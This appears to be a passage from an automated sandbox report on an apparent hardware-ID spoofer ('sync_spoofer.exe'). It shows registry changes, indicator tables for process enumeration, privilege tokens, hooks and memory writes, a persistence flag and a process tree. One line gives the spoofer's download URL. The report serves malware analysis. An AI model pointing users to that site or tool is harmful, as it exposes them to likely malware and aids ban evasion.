Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\bing.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\NumberOfSubdomains = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6f8d456dbc56da01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "1310"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\Total = "1766"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d2d24673bc56da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = e0fed281bc56da01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 5c338773bc56da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "1310"	MicrosoftEdgeCP.exe

NTFS ADS 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\7zO0F55ACC9\sync_spoofer.exe:Zone.Identifier	7zFM.exe
File created	C:\Users\Admin\Downloads\SyncSpoof.rar:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO41384068\sync_spoofer.exe:Zone.Identifier	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO0F5B1E99\ChangeLog.txt:Zone.Identifier	7zFM.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
1520	7zFM.exe
1520	7zFM.exe
7132	powershell.exe
7132	powershell.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
7132	powershell.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe
6388	sphyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4884	7zFM.exe
3676	OpenWith.exe
1520	7zFM.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2308	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2308	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3924	firefox.exe
Token: SeDebugPrivilege	3924	firefox.exe
Token: SeDebugPrivilege	1404	MicrosoftEdge.exe
Token: SeDebugPrivilege	1404	MicrosoftEdge.exe
Token: SeDebugPrivilege	3924	firefox.exe
Token: SeRestorePrivilege	4884	7zFM.exe
Token: 35	4884	7zFM.exe
Token: SeSecurityPrivilege	4884	7zFM.exe
Token: SeSecurityPrivilege	4884	7zFM.exe
Token: SeRestorePrivilege	1520	7zFM.exe
Token: 35	1520	7zFM.exe
Token: SeSecurityPrivilege	1520	7zFM.exe
Token: SeDebugPrivilege	3924	firefox.exe
Token: SeDebugPrivilege	3924	firefox.exe
Token: SeDebugPrivilege	3924	firefox.exe
Token: SeSecurityPrivilege	1520	7zFM.exe
Token: SeDebugPrivilege	6388	sphyperRuntimedhcpSvc.exe
Token: SeDebugPrivilege	7132	powershell.exe
Token: SeBackupPrivilege	1812	DevManView.exe
Token: SeRestorePrivilege	1812	DevManView.exe
Token: SeTakeOwnershipPrivilege	1812	DevManView.exe
Token: SeBackupPrivilege	4364	DevManView.exe
Token: SeRestorePrivilege	4364	DevManView.exe
Token: SeTakeOwnershipPrivilege	4364	DevManView.exe
Token: SeImpersonatePrivilege	1812	DevManView.exe
Token: SeBackupPrivilege	1388	DevManView.exe
Token: SeRestorePrivilege	1388	DevManView.exe
Token: SeTakeOwnershipPrivilege	1388	DevManView.exe
Token: SeBackupPrivilege	1416	AMIDEWINx64.exe
Token: SeRestorePrivilege	1416	AMIDEWINx64.exe
Token: SeTakeOwnershipPrivilege	1416	AMIDEWINx64.exe
Token: SeImpersonatePrivilege	4364	DevManView.exe
Token: SeImpersonatePrivilege	1388	DevManView.exe
Token: SeImpersonatePrivilege	1416	AMIDEWINx64.exe
Token: SeBackupPrivilege	2800	DevManView.exe
Token: SeRestorePrivilege	2800	DevManView.exe
Token: SeTakeOwnershipPrivilege	2800	DevManView.exe
Token: SeImpersonatePrivilege	2800	DevManView.exe
Token: SeBackupPrivilege	3000	DevManView.exe
Token: SeRestorePrivilege	3000	DevManView.exe
Token: SeTakeOwnershipPrivilege	3000	DevManView.exe
Token: SeBackupPrivilege	3532	DevManView.exe
Token: SeBackupPrivilege	3976	DevManView.exe
Token: SeRestorePrivilege	3532	DevManView.exe
Token: SeTakeOwnershipPrivilege	3532	DevManView.exe
Token: SeRestorePrivilege	3976	DevManView.exe
Token: SeTakeOwnershipPrivilege	3976	DevManView.exe
Token: SeBackupPrivilege	4960	DevManView.exe
Token: SeRestorePrivilege	4960	DevManView.exe
Token: SeTakeOwnershipPrivilege	4960	DevManView.exe
Token: SeImpersonatePrivilege	3000	DevManView.exe
Token: SeImpersonatePrivilege	4960	DevManView.exe
Token: SeImpersonatePrivilege	3532	DevManView.exe
Token: SeImpersonatePrivilege	3976	DevManView.exe
Token: SeBackupPrivilege	4640	DevManView.exe
Token: SeRestorePrivilege	4640	DevManView.exe
Token: SeTakeOwnershipPrivilege	4640	DevManView.exe
Token: SeBackupPrivilege	3996	DevManView.exe

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
4884	7zFM.exe
4884	7zFM.exe
4884	7zFM.exe
3924	firefox.exe
3924	firefox.exe
1520	7zFM.exe
1520	7zFM.exe
1520	7zFM.exe

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe

Suspicious use of SetWindowsHookEx 52 IoCs

pid	Process
1404	MicrosoftEdge.exe
4456	MicrosoftEdgeCP.exe
4292	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
4440	MicrosoftEdgeCP.exe
1404	MicrosoftEdge.exe
1404	MicrosoftEdge.exe
1404	MicrosoftEdge.exe
1404	MicrosoftEdge.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3924	firefox.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
2976	sync_spoofer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4456 wrote to memory of 1300	4456	MicrosoftEdgeCP.exe	76
PID 4456 wrote to memory of 1300	4456	MicrosoftEdgeCP.exe	76
PID 4456 wrote to memory of 1300	4456	MicrosoftEdgeCP.exe	76
PID 4456 wrote to memory of 1300	4456	MicrosoftEdgeCP.exe	76
PID 4456 wrote to memory of 1300	4456	MicrosoftEdgeCP.exe	76
PID 4456 wrote to memory of 1300	4456	MicrosoftEdgeCP.exe	76
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 1792 wrote to memory of 3924	1792	firefox.exe	86
PID 3924 wrote to memory of 5220	3924	firefox.exe	87
PID 3924 wrote to memory of 5220	3924	firefox.exe	87
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88
PID 3924 wrote to memory of 5288	3924	firefox.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://www.perfectmod.fun/hwid-spoofer"
1⤵
PID:1528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1404

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4440

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4088

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:212

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Program Files\Mozilla Firefox\firefox.exe
